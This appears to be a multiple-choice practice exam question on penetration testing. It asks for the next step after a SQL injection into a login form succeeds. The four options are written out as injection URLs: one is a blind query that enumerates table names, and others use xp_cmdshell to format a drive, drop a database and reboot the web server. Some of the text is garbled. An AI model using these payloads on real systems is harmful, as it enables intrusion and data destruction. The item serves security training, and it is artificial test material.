Exhibit:
You are conducting pen-test against a company’s website using SQL Injection techniques. You enter “anuthing or 1=1-” in the username filed of an authentication form. This is the output returned from the server.
What is the next step you should do?
A.
Identify the user context of the web application by running_ http://www.example.com/order/include_rsa_asp?pressReleaseID=5 AND
USER_NAME() = `dbo’
B.
Identify the database and table name by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=’U’),1))) > 109
C.
Format the C: drive and delete the database by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell `format c: /q /yes `; drop database myDB; —
D.
Reboot the web server by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell `iisreset �reboot’; —